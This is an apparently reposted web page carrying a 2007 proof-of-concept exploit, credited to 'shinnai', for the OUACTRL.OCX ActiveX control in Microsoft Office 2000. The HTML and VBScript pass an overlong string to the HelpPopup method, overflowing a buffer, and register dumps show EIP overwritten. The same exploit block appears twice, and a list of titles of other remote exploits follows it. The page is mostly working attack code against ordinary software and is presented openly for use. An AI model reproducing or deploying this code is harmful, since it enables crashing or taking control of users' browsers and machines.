Microsoft Office 2000 (OUACTRL.OCX v. 1.0.1.9) Remote DoS Exploit
2007-05-26 21:06
411 查看
<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/23</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------------------------------------------
<b>Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)</b>
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
---------------------------------------------------------------------------------------------------------------------------
<object classid='clsid:8936033C-4A50-11D1-98A4-00A0C90F27C6' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
</script>
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
</span></span>
</code></pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/23</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------------------------------------------
<b>Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)</b>
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
---------------------------------------------------------------------------------------------------------------------------
<object classid='clsid:8936033C-4A50-11D1-98A4-00A0C90F27C6' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
</script>
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
</span></span>
</code></pre>
相关文章推荐
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- mo_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
- thinkphp remote exploit
- phpMyAdmin3 remote code execute php版本 exploit
- Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof
- Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
- IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit
- IMail iaspam.dll 8.0x Remote Heap Overflow Exploit
- Microsoft WINS Remote Code Execution Exploit (MS04-045)
- MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability
- 先装的2000 XP 后装DOS 98的DIY法- -
- XlightFTP Server v3.7.0 Remote Root BOF Exploit
- 2000下也轻松实现纯DOS环境
- [2000]MS Windows IIS Unicode Remote Transversal Bug
- Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit
- Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
- phpBB Links MOD Remote Blind SQL Injection Exploit
- MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit
- DameWare Mini Remote Control Server Local SYSTEM Exploit